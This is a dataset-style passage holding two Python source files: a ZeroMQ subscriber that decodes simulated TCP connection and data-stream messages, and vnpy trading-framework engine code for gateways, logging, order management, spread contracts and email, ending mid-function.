source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
zmq_server.py |
import zmq
import struct
import ipaddress
import binascii
import threading
def reqrep_server(context):
    """Blocking REQ/REP health-check endpoint: answers b'ping' with b'pong'.

    Runs in its own thread until the shared zmq context is terminated,
    at which point the blocking recv() raises ContextTerminated and the
    thread returns cleanly.
    """
    rep_sock = context.socket(zmq.REP)
    rep_sock.bind("tcp://*:5556")
    try:
        while True:
            request = rep_sock.recv()
            print("Received request:" + str(request))
            if request == b'ping':
                rep_sock.send(b"pong")
    except zmq.ContextTerminated:
        return
# Topics published by the shadow side; SUB subscriptions are prefix matches,
# so subscribing to "shadow_tcp_datastream" also receives the
# "shadow_tcp_datastream_send" / "shadow_tcp_datastream_recv" topics
# handled below.
topic_tcpcontrol = "shadow_tcp_control".encode('ascii')
topic_tcpdata = "shadow_tcp_datastream".encode('ascii')
#topic = "fancyhw_data".encode('ascii')
print(f"Reading messages with topic: {topic_tcpcontrol}, {topic_tcpdata}")
with zmq.Context() as context:
    # run req-rep server as separate thread
    rep_th = threading.Thread(target=reqrep_server, args=(context,))
    rep_th.start()
    socket = context.socket(zmq.SUB)
    socket.bind("tcp://*:5555")
    socket.setsockopt(zmq.SUBSCRIBE, topic_tcpcontrol)
    socket.setsockopt(zmq.SUBSCRIBE, topic_tcpdata)
    i = 0  # count of messages whose topic matched one of the handlers
    print("connect done")
    try:
        while True:
            # Wire format: b"<topic> <payload>" — split on the first space only.
            binary_topic, received_data = socket.recv().split(b' ', 1)
            # topic_size = len("shadow_tcp_stream")
            # Field widths (bytes) of the fixed-size header in the payload.
            fd_size = 4
            port_size = 2
            addr_size = 4
            time_size = 8
            topic = binary_topic.decode(encoding='ascii')
            if topic == "shadow_tcp_control":
                # Layout: u64 time | i32 fd | u32 from_addr | u16 port | u32 addr
                binary_time = received_data[:time_size]
                binary_fd = received_data[time_size:time_size+fd_size]
                binary_from_addr = received_data[time_size+fd_size:time_size+fd_size+addr_size]
                binary_port = received_data[time_size+fd_size+addr_size:time_size+fd_size+addr_size+port_size]
                binary_addr = received_data[time_size+fd_size+addr_size+port_size:]
                print("Message {:d}:".format(i))
                # "Q"/"i" use native byte order — assumes the producer runs on a
                # same-endian host; address/port fields use network order ("!").
                time = struct.unpack("Q", binary_time)[0]
                time = time / 1000000000.0  # nanoseconds -> seconds
                fd = struct.unpack("i", binary_fd)[0]
                from_addr = struct.unpack("!I", binary_from_addr)[0]
                from_addr = str(ipaddress.ip_address(from_addr))
                port = struct.unpack("!H", binary_port)[0]
                addr = struct.unpack("!I", binary_addr)[0]
                addr = str(ipaddress.ip_address(addr))
                print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, {from_addr}-->{addr}:{port} (TCP connection)')
            elif topic == "shadow_tcp_datastream_send":
                # Layout: u64 time | i32 fd | u16 from_port | u32 from_addr
                #         | u16 peer_port | u32 peer_addr | raw buffer (rest)
                binary_time = received_data[:time_size]
                binary_fd = received_data[time_size:time_size+fd_size]
                binary_from_port = received_data[time_size+fd_size:time_size+fd_size+port_size]
                binary_from_addr = received_data[time_size+fd_size+port_size:time_size+fd_size+port_size+addr_size]
                binary_peer_port = received_data[time_size+fd_size+port_size+addr_size:time_size+fd_size+port_size+addr_size+port_size]
                binary_peer_addr = received_data[time_size+fd_size+port_size+addr_size+port_size:time_size+fd_size + port_size + addr_size + port_size+addr_size]
                binary_buf = received_data[time_size+fd_size + port_size + addr_size + port_size+addr_size:]
                time = struct.unpack("Q", binary_time)[0]
                time = time / 1000000000.0
                fd = struct.unpack("i", binary_fd)[0]
                buf = binascii.hexlify(binary_buf)
                from_port = struct.unpack("!H", binary_from_port)[0]
                from_addr = struct.unpack("!I", binary_from_addr)[0]
                from_addr = str(ipaddress.ip_address(from_addr))
                peer_port = struct.unpack("!H", binary_peer_port)[0]
                peer_addr = struct.unpack("!I", binary_peer_addr)[0]
                peer_addr = str(ipaddress.ip_address(peer_addr))
                print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, {from_addr}:{from_port}-->{peer_addr}:{peer_port}, buf:[{buf}]\n\t\t\tbufstr:[{binary_buf}]')
            elif topic == "shadow_tcp_datastream_recv":
                # Layout: u64 time | i32 fd | u16 myport | u32 myaddr | raw buffer
                binary_time = received_data[:time_size]
                binary_fd = received_data[time_size:time_size+fd_size]
                binary_myport = received_data[time_size+fd_size:time_size+fd_size+port_size]
                binary_myaddr = received_data[time_size+fd_size+port_size:time_size+fd_size+port_size+addr_size]
                binary_buf = received_data[time_size+fd_size+port_size+addr_size:]
                time = struct.unpack("Q", binary_time)[0]
                time = time / 1000000000.0
                fd = struct.unpack("i", binary_fd)[0]
                buf = binascii.hexlify(binary_buf)
                myport = struct.unpack("!H", binary_myport)[0]
                myaddr = struct.unpack("!I", binary_myaddr)[0]
                myaddr = str(ipaddress.ip_address(myaddr))
                print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, -->{myaddr}:{myport}, buf:[{buf}]')
            i += 1
    except KeyboardInterrupt:
        socket.close()
    except Exception as error:
        print("ERROR: {}".format(error))
        socket.close()
    finally:
        # Terminating the context also unblocks the reqrep_server thread.
        context.term()
|
engine.py | """
"""
import logging
from logging import Logger
import smtplib
import os
import sys
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
Direction,
Exchange,
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
# 专有的logger文件
from .util_logger import setup_logger
class MainEngine:
    """
    Acts as the core of VN Trader.

    Owns the event engine plus every gateway (broker connection),
    function engine and app, and exposes a facade of query/trading
    helpers that route each call to the right gateway by name.
    """

    def __init__(self, event_engine: EventEngine = None):
        """Reuse the supplied event engine or create one, then start it."""
        if event_engine:
            self.event_engine: EventEngine = event_engine
        else:
            self.event_engine = EventEngine()
        self.event_engine.start()
        self.gateways: Dict[str, BaseGateway] = {}
        self.engines: Dict[str, BaseEngine] = {}
        self.apps: Dict[str, BaseApp] = {}
        self.exchanges: List[Exchange] = []
        # Direct references to well-known app engines, filled in add_app().
        self.rm_engine = None
        self.algo_engine = None
        self.rpc_service = None
        os.chdir(TRADER_DIR)  # Change working directory
        self.init_engines()  # Initialize function engines

    def add_engine(self, engine_class: Any) -> "BaseEngine":
        """
        Add function engine.

        The engine is instantiated with (main_engine, event_engine) and
        registered under its own engine_name.
        """
        engine = engine_class(self, self.event_engine)
        self.engines[engine.engine_name] = engine
        return engine

    def add_gateway(self, gateway_class: Type[BaseGateway], gateway_name: str = None) -> BaseGateway:
        """
        Add gateway.

        An explicit gateway_name lets several accounts of the same broker
        interface be connected side by side.
        """
        if gateway_name:
            # Use the caller-supplied name to distinguish gateway instances.
            gateway = gateway_class(self.event_engine, gateway_name=gateway_name)
        else:
            # Fall back to the gateway class's own default name.
            gateway = gateway_class(self.event_engine)
            gateway_name = gateway.gateway_name
        self.write_log(f'添加{gateway_name}网关')
        self.gateways[gateway_name] = gateway
        # Add gateway supported exchanges into engine
        for exchange in gateway.exchanges:
            if exchange not in self.exchanges:
                self.exchanges.append(exchange)
        return gateway

    def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
        """
        Add app, create its engine, and remember well-known app engines.
        """
        app = app_class()
        self.apps[app.app_name] = app
        engine = self.add_engine(app.engine_class)
        if app.app_name == "RiskManager":
            self.rm_engine = engine
        elif app.app_name == "AlgoTrading":
            self.algo_engine = engine
        elif app.app_name == 'RpcService':
            self.rpc_service = engine
        return engine

    def init_engines(self) -> None:
        """
        Init all engines.
        """
        self.add_engine(LogEngine)
        self.add_engine(OmsEngine)
        self.add_engine(EmailEngine)

    def write_log(self, msg: str, source: str = "") -> None:
        """
        Put log event with specific message.
        """
        log = LogData(msg=msg, gateway_name=source)
        event = Event(EVENT_LOG, log)
        self.event_engine.put(event)

    def write_error(self, msg: str, source: str = "") -> None:
        """
        Same as write_log, but additionally echoes the message to stderr.
        """
        log = LogData(msg=msg, gateway_name=source)
        event = Event(EVENT_LOG, log)
        self.event_engine.put(event)
        print(msg, file=sys.stderr)

    def get_gateway(self, gateway_name: str) -> BaseGateway:
        """
        Return gateway object by name (None, plus an error log, if absent).
        """
        gateway = self.gateways.get(gateway_name, None)
        if not gateway:
            self.write_error(f"找不到底层接口:{gateway_name}")
        return gateway

    def get_engine(self, engine_name: str) -> "BaseEngine":
        """
        Return engine object by name (None, plus an error log, if absent).
        """
        engine = self.engines.get(engine_name, None)
        if not engine:
            self.write_error(f"找不到引擎:{engine_name}")
        return engine

    def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
        """
        Get default setting dict of a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.get_default_setting()
        else:
            self.write_error(f'获取网格设置时,找不到{gateway_name}')
            return None

    def get_all_gateway_names(self) -> List[str]:
        """
        Get all names of gateways added in main engine.
        """
        return list(self.gateways.keys())

    def get_all_gateway_status(self) -> List[dict]:
        """
        Get the status dict of every gateway, as [{name: status}, ...].
        """
        return list([{k: v.get_status()} for k, v in self.gateways.items()])

    def get_all_apps(self) -> List[BaseApp]:
        """
        Get all app objects.
        """
        return list(self.apps.values())

    def get_all_exchanges(self) -> List[Exchange]:
        """
        Get all exchanges.
        """
        return self.exchanges

    def connect(self, setting: dict, gateway_name: str) -> None:
        """
        Start connection of a specific gateway.

        Connection errors are logged rather than propagated.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            try:
                gateway.connect(setting)
            except Exception as ex:
                msg = f'gateway:{gateway_name}启动连接失败:{str(ex)}'
                self.write_log(msg=msg)
        else:
            self.write_error(f'连接{gateway_name}时,系统找不到{gateway_name}')

    def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
        """
        Subscribe tick data update of a specific gateway.

        If gateway_name is empty, the request is forwarded to every gateway.
        """
        if gateway_name:
            gateway = self.get_gateway(gateway_name)
            if gateway:
                gateway.subscribe(req)
            else:
                self.write_error(f'订阅合约时,找不到{gateway_name}')
        else:
            for gateway in self.gateways.values():
                if gateway:
                    gateway.subscribe(req)

    def send_order(self, req: OrderRequest, gateway_name: str) -> str:
        """
        Send new order request to a specific gateway.

        Custom spread (SPD) contracts are routed to the algo engine
        instead, which matches the legs internally.
        """
        # Custom spread contract: delegate to the algo engine.
        if self.algo_engine and req.exchange == Exchange.SPD:
            return self.algo_engine.send_spd_order(
                req=req,
                gateway_name=gateway_name)
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.send_order(req)
        else:
            self.write_error(f'发送委托时,找不到{gateway_name}')
            return ""

    def cancel_order(self, req: CancelRequest, gateway_name: str) -> bool:
        """
        Send cancel order request to a specific gateway.
        """
        # Custom spread contract: delegate to the algo engine.
        if self.algo_engine and req.exchange == Exchange.SPD:
            return self.algo_engine.cancel_spd_order(
                req=req)
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.cancel_order(req)
        else:
            self.write_error(f'撤单时,找不到{gateway_name}')
            return False

    def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
        """
        Send a batch of orders; returns one vt_orderid per request
        (empty strings when the gateway is missing).
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.send_orders(reqs)
        else:
            self.write_error(f'批量发单时,找不到{gateway_name}')
            return ["" for req in reqs]

    def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
        """
        Cancel a batch of orders on a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            gateway.cancel_orders(reqs)
        else:
            self.write_error(f'批量撤单时,找不到{gateway_name}')

    def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
        """
        Query historical bar data from a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.query_history(req)
        else:
            self.write_error(f'找不到网关{gateway_name},请检查合约得网关是否与连接得网关一致')
            return None

    def close(self) -> None:
        """
        Make sure every gateway and app is closed properly before
        programme exit.
        """
        # save_contracts is injected onto main_engine by OmsEngine.add_function().
        if hasattr(self, 'save_contracts'):
            self.save_contracts()
        # Stop event engine first to prevent new timer event.
        self.event_engine.stop()
        for engine in self.engines.values():
            engine.close()
        for gateway in self.gateways.values():
            gateway.close()
class BaseEngine(ABC):
    """
    Abstract class for implementing a function engine.

    Every engine gets its own file logger (named after the engine) so
    its output can be separated from the global log.
    """

    def __init__(
        self,
        main_engine: MainEngine,
        event_engine: EventEngine,
        engine_name: str,
    ):
        """Store references and create the engine-specific logger."""
        self.main_engine = main_engine
        self.event_engine = event_engine
        self.engine_name = engine_name
        self.logger = None
        self.create_logger(engine_name)

    def create_logger(self, logger_name: str = 'base_engine'):
        """
        Create this engine's dedicated file logger under the log folder.

        :param logger_name: logger name; defaults to the engine's name
        :return: None (sets self.logger)
        """
        log_path = get_folder_path("log")
        log_filename = str(log_path.joinpath(logger_name))
        print(u'create logger:{}'.format(log_filename))
        self.logger = setup_logger(file_name=log_filename, name=logger_name,
                                   log_level=SETTINGS.get('log.level', logging.DEBUG))

    def write_log(self, msg: str, source: str = "", level: int = logging.DEBUG):
        """
        Write a log line.

        Goes to this engine's own logger when one exists; otherwise the
        message is posted as an EVENT_LOG event for the global LogEngine.

        :param msg: log message
        :param source: origin tag, prefixed as [source] when set
        :param level: logging level
        :return: None
        """
        if self.logger:
            if len(source) > 0:
                msg = f'[{source}]{msg}'
            self.logger.log(level, msg)
        else:
            log = LogData(msg=msg, level=level, gateway_name='')
            event = Event(EVENT_LOG, log)
            self.event_engine.put(event)

    def close(self):
        """Hook for subclasses; base engine holds no resources to release."""
        pass
class LogEngine(BaseEngine):
    """
    Processes log event and output with logging module.

    Console and file handlers are attached according to SETTINGS; when
    log.active is false the engine stays inert (no handlers, no event
    registration).
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Build handlers per SETTINGS and subscribe to EVENT_LOG."""
        super(LogEngine, self).__init__(main_engine, event_engine, "log")
        if not SETTINGS["log.active"]:
            return
        self.level: int = SETTINGS["log.level"]
        # Replaces the per-engine logger from BaseEngine with the global one.
        self.logger: Logger = logging.getLogger("VN Trader")
        self.logger.setLevel(self.level)
        self.formatter = logging.Formatter(
            "%(asctime)s  %(levelname)s: %(message)s"
        )
        self.add_null_handler()
        if SETTINGS["log.console"]:
            self.add_console_handler()
        if SETTINGS["log.file"]:
            self.add_file_handler()
        self.register_event()

    def add_null_handler(self) -> None:
        """
        Add null handler for logger.
        """
        null_handler = logging.NullHandler()
        self.logger.addHandler(null_handler)

    def add_console_handler(self) -> None:
        """
        Add console output of log.
        """
        console_handler = logging.StreamHandler()
        console_handler.setLevel(self.level)
        console_handler.setFormatter(self.formatter)
        self.logger.addHandler(console_handler)

    def add_file_handler(self) -> None:
        """
        Add file output of log (one file per day under the log folder).
        """
        today_date = datetime.now().strftime("%Y%m%d")
        filename = f"vt_{today_date}.log"
        log_path = get_folder_path("log")
        file_path = log_path.joinpath(filename)
        file_handler = logging.FileHandler(
            file_path, mode="a", encoding="utf8"
        )
        file_handler.setLevel(self.level)
        file_handler.setFormatter(self.formatter)
        self.logger.addHandler(file_handler)

    def register_event(self) -> None:
        """Subscribe to EVENT_LOG events from the event engine."""
        self.event_engine.register(EVENT_LOG, self.process_log_event)

    def process_log_event(self, event: Event) -> None:
        """
        Process log event: forward the LogData to the logging module.
        """
        log = event.data
        self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
    """
    Provides order management system function for VN Trader.

    Caches the latest ticks/orders/trades/positions/accounts/contracts
    keyed by their vt_* ids, maintains custom spread ("SPD") contracts,
    and injects its query methods onto the main engine.
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Initialize caches, hook queries onto main_engine, load contract cache."""
        super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
        self.ticks: Dict[str, TickData] = {}
        self.orders: Dict[str, OrderData] = {}
        self.trades: Dict[str, TradeData] = {}
        self.positions: Dict[str, PositionData] = {}
        self.accounts: Dict[str, AccountData] = {}
        self.contracts: Dict[str, ContractData] = {}
        self.today_contracts: Dict[str, ContractData] = {}
        # Custom (spread) contracts
        self.custom_contracts = {}  # vt_symbol: ContractData
        self.custom_settings = {}  # symbol: dict
        self.symbol_spd_maping = {}  # symbol: [spd_symbol]
        self.prices = {}  # vt_symbol: last traded price
        self.active_orders: Dict[str, OrderData] = {}
        self.add_function()
        self.register_event()
        self.load_contracts()

    def __del__(self):
        """Persist the contract cache on garbage collection.

        NOTE(review): side effects in __del__ are unreliable at interpreter
        shutdown; MainEngine.close() also calls save_contracts explicitly.
        """
        self.save_contracts()

    def load_contracts(self) -> None:
        """Load the contract dict from the local cache file and merge custom contracts."""
        import bz2
        import pickle
        contract_file_name = 'vn_contract.pkb2'
        if os.path.exists(contract_file_name):
            try:
                with bz2.BZ2File(contract_file_name, 'rb') as f:
                    self.contracts = pickle.load(f)
                    self.write_log(f'加载缓存合约字典:{contract_file_name}')
            except Exception as ex:
                self.write_log(f'加载缓存合约异常:{str(ex)}')
        # Merge in the user-defined custom (spread) contracts.
        custom_contracts = self.get_all_custom_contracts()
        self.get_all_custom_contracts(rtn_setting=True)  # also populates custom_settings
        for contract in custom_contracts.values():
            # Cache under both the plain symbol and the vt_symbol.
            self.contracts.update({contract.symbol: contract})
            self.contracts.update({contract.vt_symbol: contract})
            self.today_contracts[contract.vt_symbol] = contract
            self.today_contracts[contract.symbol] = contract
            # Active / passive legs of the custom contract.
            setting = self.custom_settings.get(contract.symbol, {})
            leg1_symbol = setting.get('leg1_symbol')
            leg2_symbol = setting.get('leg2_symbol')
            # Build the leg-symbol => [spread-symbol] mapping.
            for symbol in [leg1_symbol, leg2_symbol]:
                spd_mapping_list = self.symbol_spd_maping.get(symbol, [])
                # NOTE(review): only symbols NOT ending in '.SPD' are appended —
                # confirm this matches the spread naming convention in use.
                if (not contract.symbol.endswith('.SPD')) and contract.symbol not in spd_mapping_list:
                    spd_mapping_list.append(contract.symbol)
                self.symbol_spd_maping.update({symbol: spd_mapping_list})

    def save_contracts(self) -> None:
        """Persist contract objects to the cache file (today's if any, else all)."""
        import bz2
        import pickle
        contract_file_name = 'vn_contract.pkb2'
        with bz2.BZ2File(contract_file_name, 'wb') as f:
            if len(self.today_contracts) > 0:
                self.write_log(f'保存今日合约对象到缓存文件')
                pickle.dump(self.today_contracts, f)
            else:
                pickle.dump(self.contracts, f)

    def add_function(self) -> None:
        """Add query function to main engine."""
        self.main_engine.get_tick = self.get_tick
        self.main_engine.get_order = self.get_order
        self.main_engine.get_price = self.get_price
        self.main_engine.get_trade = self.get_trade
        self.main_engine.get_position = self.get_position
        self.main_engine.get_account = self.get_account
        self.main_engine.get_contract = self.get_contract
        self.main_engine.get_exchange = self.get_exchange
        self.main_engine.get_custom_contract = self.get_custom_contract
        self.main_engine.get_all_ticks = self.get_all_ticks
        self.main_engine.get_all_orders = self.get_all_orders
        self.main_engine.get_all_trades = self.get_all_trades
        self.main_engine.get_all_positions = self.get_all_positions
        self.main_engine.get_all_accounts = self.get_all_accounts
        self.main_engine.get_all_contracts = self.get_all_contracts
        self.main_engine.get_all_active_orders = self.get_all_active_orders
        self.main_engine.get_all_custom_contracts = self.get_all_custom_contracts
        self.main_engine.get_mapping_spd = self.get_mapping_spd
        self.main_engine.save_contracts = self.save_contracts

    def register_event(self) -> None:
        """Subscribe the cache-updating handlers to every data event type."""
        self.event_engine.register(EVENT_TICK, self.process_tick_event)
        self.event_engine.register(EVENT_ORDER, self.process_order_event)
        self.event_engine.register(EVENT_TRADE, self.process_trade_event)
        self.event_engine.register(EVENT_POSITION, self.process_position_event)
        self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
        self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)

    def process_tick_event(self, event: Event) -> None:
        """Cache the tick; track last price except for combo symbols ('&')."""
        tick = event.data
        self.ticks[tick.vt_symbol] = tick
        if '&' not in tick.symbol and tick.last_price:
            self.prices[tick.vt_symbol] = tick.last_price

    def process_order_event(self, event: Event) -> None:
        """Cache the order and keep the active-order dict in sync."""
        order = event.data
        self.orders[order.vt_orderid] = order
        # If order is active, then update data in dict.
        if order.is_active():
            self.active_orders[order.vt_orderid] = order
        # Otherwise, pop inactive order from in dict
        elif order.vt_orderid in self.active_orders:
            self.active_orders.pop(order.vt_orderid)

    def process_trade_event(self, event: Event) -> None:
        """Cache the trade by vt_tradeid."""
        trade = event.data
        self.trades[trade.vt_tradeid] = trade

    def process_position_event(self, event: Event) -> None:
        """Cache the position; for real legs, derive spread positions too."""
        position = event.data
        self.positions[position.vt_positionid] = position
        if position.exchange != Exchange.SPD:
            self.create_spd_position_event(position.symbol, position.direction)

    def reverse_direction(self, direction):
        """Return the opposite direction (LONG<->SHORT; others unchanged)."""
        if direction == Direction.LONG:
            return Direction.SHORT
        elif direction == Direction.SHORT:
            return Direction.LONG
        return direction

    def create_spd_position_event(self, symbol, direction):
        """Synthesize and publish a position for every custom spread using `symbol` as a leg."""
        spd_symbols = self.symbol_spd_maping.get(symbol, [])
        if not spd_symbols:
            return
        for spd_symbol in spd_symbols:
            spd_setting = self.custom_settings.get(spd_symbol, None)
            if not spd_setting:
                continue
            leg1_symbol = spd_setting.get('leg1_symbol')
            leg2_symbol = spd_setting.get('leg2_symbol')
            leg1_contract = self.contracts.get(leg1_symbol)
            leg2_contract = self.contracts.get(leg2_symbol)
            # NOTE(review): spd_contract is assumed present (loaded in
            # load_contracts); a missing entry would raise below — confirm.
            spd_contract = self.contracts.get(spd_symbol)
            if leg1_contract is None or leg2_contract is None:
                continue
            leg1_ratio = spd_setting.get('leg1_ratio', 1)
            leg2_ratio = spd_setting.get('leg2_ratio', 1)
            # Locate the leg1/leg2 positions and infer the spread direction.
            spd_pos = None
            if leg1_symbol == symbol:
                k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{direction.value}"
                leg1_pos = self.positions.get(k1)
                k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{self.reverse_direction(direction).value}"
                leg2_pos = self.positions.get(k2)
                spd_direction = direction
                k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
                spd_pos = self.positions.get(k3)
            elif leg2_symbol == symbol:
                k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{self.reverse_direction(direction).value}"
                leg1_pos = self.positions.get(k1)
                k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{direction.value}"
                leg2_pos = self.positions.get(k2)
                spd_direction = self.reverse_direction(direction)
                k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
                spd_pos = self.positions.get(k3)
            else:
                continue
            if leg1_pos is None or leg2_pos is None:  # or leg1_pos.volume ==0 or leg2_pos.volume == 0:
                continue
            # Largest whole spread volume implied by the legs' volumes/ratios.
            spd_volume = min(int(leg1_pos.volume / leg1_ratio), int(leg2_pos.volume / leg2_ratio))
            if spd_volume <= 0 and spd_pos is None:
                continue
            if spd_setting.get('is_ratio', False) and leg2_pos.price > 0:
                # NOTE(review): numerator uses leg2_pos.price; a ratio spread
                # would normally use leg1_pos.price here — confirm intent.
                spd_price = 100 * (leg2_pos.price * leg1_ratio) / (leg2_pos.price * leg2_ratio)
            elif spd_setting.get('is_spread', False):
                spd_price = leg1_pos.price * leg1_ratio - leg2_pos.price * leg2_ratio
            else:
                spd_price = 0
            spd_pos = PositionData(
                gateway_name=spd_contract.gateway_name,
                accountid=leg1_pos.accountid,
                symbol=spd_symbol,
                exchange=Exchange.SPD,
                direction=spd_direction,
                volume=spd_volume,
                price=spd_price
            )
            event = Event(EVENT_POSITION, data=spd_pos)
            self.event_engine.put(event)

    def process_account_event(self, event: Event) -> None:
        """Cache the account by vt_accountid."""
        account = event.data
        self.accounts[account.vt_accountid] = account

    def process_contract_event(self, event: Event) -> None:
        """Cache the contract under both vt_symbol and plain symbol."""
        contract = event.data
        self.contracts[contract.vt_symbol] = contract
        self.contracts[contract.symbol] = contract
        self.today_contracts[contract.vt_symbol] = contract
        self.today_contracts[contract.symbol] = contract

    def get_exchange(self, symbol: str) -> Exchange:
        """Return the exchange for a symbol (Exchange.LOCAL when unknown)."""
        contract = self.contracts.get(symbol, None)
        if contract is None:
            return Exchange.LOCAL
        return contract.exchange

    def get_tick(self, vt_symbol: str) -> Optional[TickData]:
        """
        Get latest market tick data by vt_symbol.
        """
        return self.ticks.get(vt_symbol, None)

    def get_price(self, vt_symbol):
        """
        Get the latest price by vt_symbol.

        :param vt_symbol: contract vt_symbol
        :return: last price or None
        """
        return self.prices.get(vt_symbol, None)

    def get_order(self, vt_orderid) -> Optional[OrderData]:
        """
        Get latest order data by vt_orderid.
        """
        return self.orders.get(vt_orderid, None)

    def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
        """
        Get trade data by vt_tradeid.
        """
        return self.trades.get(vt_tradeid, None)

    def get_position(self, vt_positionid: str) -> Optional[PositionData]:
        """
        Get latest position data by vt_positionid.
        """
        return self.positions.get(vt_positionid, None)

    def get_account(self, vt_accountid: str) -> Optional[AccountData]:
        """
        Get latest account data by vt_accountid.
        """
        return self.accounts.get(vt_accountid, None)

    def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
        """
        Get contract data by vt_symbol.
        """
        return self.contracts.get(vt_symbol, None)

    def get_all_ticks(self) -> List[TickData]:
        """
        Get all tick data.
        """
        return list(self.ticks.values())

    def get_all_orders(self) -> List[OrderData]:
        """
        Get all order data.
        """
        return list(self.orders.values())

    def get_all_trades(self) -> List[TradeData]:
        """
        Get all trade data.
        """
        return list(self.trades.values())

    def get_all_positions(self) -> List[PositionData]:
        """
        Get all position data.
        """
        return list(self.positions.values())

    def get_all_accounts(self) -> List[AccountData]:
        """
        Get all account data.
        """
        return list(self.accounts.values())

    def get_all_contracts(self) -> List[ContractData]:
        """
        Get all contract data.
        """
        return list(self.contracts.values())

    def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
        """
        Get all active orders by vt_symbol.

        If vt_symbol is empty, return all active orders.
        """
        if not vt_symbol:
            return list(self.active_orders.values())
        else:
            active_orders = [
                order
                for order in self.active_orders.values()
                if order.vt_symbol == vt_symbol
            ]
            return active_orders

    def get_custom_contract(self, symbol):
        """
        Get the setting dict of a custom contract.

        :param symbol: e.g. "pb2012-1-pb2101-1-CJ"
        :return: e.g. {
            "name": "pb跨期价差",
            "exchange": "SPD",
            "leg1_symbol": "pb2012",
            "leg1_exchange": "SHFE",
            "leg1_ratio": 1,
            "leg2_symbol": "pb2101",
            "leg2_exchange": "SHFE",
            "leg2_ratio": 1,
            "is_spread": true,
            "size": 1,
            "margin_rate": 0.1,
            "price_tick": 5
        }
        """
        return self.custom_settings.get(symbol, None)

    def get_all_custom_contracts(self, rtn_setting=False):
        """
        Get all custom contracts (or, with rtn_setting=True, their settings).

        Both dicts are lazily loaded from CustomContract on first use.
        :return: settings dict or contracts dict
        """
        if rtn_setting:
            if len(self.custom_settings) == 0:
                c = CustomContract()
                self.custom_settings = c.get_config()
            return self.custom_settings
        if len(self.custom_contracts) == 0:
            c = CustomContract()
            self.custom_settings = c.get_config()
            self.custom_contracts = c.get_contracts()
        return self.custom_contracts

    def get_mapping_spd(self, symbol):
        """Return the spread-symbol list that uses `symbol` as a leg."""
        return self.symbol_spd_maping.get(symbol, [])
class CustomContract(object):
    """
    Custom (user-defined) contracts.

    Used when initializing the system to supplement the local contract
    file (contracts.vt), and by the CTP gateway to load custom spread
    contracts for internal quote matching.
    """
    # Config file (a dict) for custom contracts in the working directory.
    file_name = 'custom_contracts.json'

    def __init__(self):
        """Load all custom-contract settings from the JSON config file."""
        from vnpy.trader.utility import load_json
        self.setting = load_json(self.file_name)  # all settings, keyed by symbol

    def get_config(self):
        """Return the raw settings dict."""
        return self.setting

    def get_contracts(self):
        """Build ContractData objects for every configured custom contract,
        keyed by vt_symbol."""
        d = {}
        from vnpy.trader.object import ContractData, Exchange
        for symbol, setting in self.setting.items():
            gateway_name = setting.get('gateway_name', None)
            if gateway_name is None:
                # Fall back to the globally configured gateway name.
                gateway_name = SETTINGS.get('gateway_name', '')
            vn_exchange = Exchange(setting.get('exchange', 'SPD'))
            contract = ContractData(
                gateway_name=gateway_name,
                symbol=symbol,
                exchange=vn_exchange,
                name=setting.get('name', symbol),
                size=setting.get('size', 100),
                product=None,
                pricetick=setting.get('price_tick', 0.01),
                margin_rate=setting.get('margin_rate', 0.1)
            )
            d[contract.vt_symbol] = contract
        return d
class EmailEngine(BaseEngine):
    """
    Provides email sending function for VN Trader.

    Messages are queued and sent by a background thread, which is only
    started lazily on the first send_email call.
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Set up the worker thread and queue, and hook send_email onto main_engine."""
        super(EmailEngine, self).__init__(main_engine, event_engine, "email")
        self.thread: Thread = Thread(target=self.run)
        self.queue: Queue = Queue()
        self.active: bool = False
        self.main_engine.send_email = self.send_email

    def send_email(self, subject: str, content: str, receiver: str = "") -> None:
        """Queue an email; sender/receiver defaults come from SETTINGS."""
        # Start email engine when sending first email.
        if not self.active:
            self.start()
        # Use default receiver if not specified.
        if not receiver:
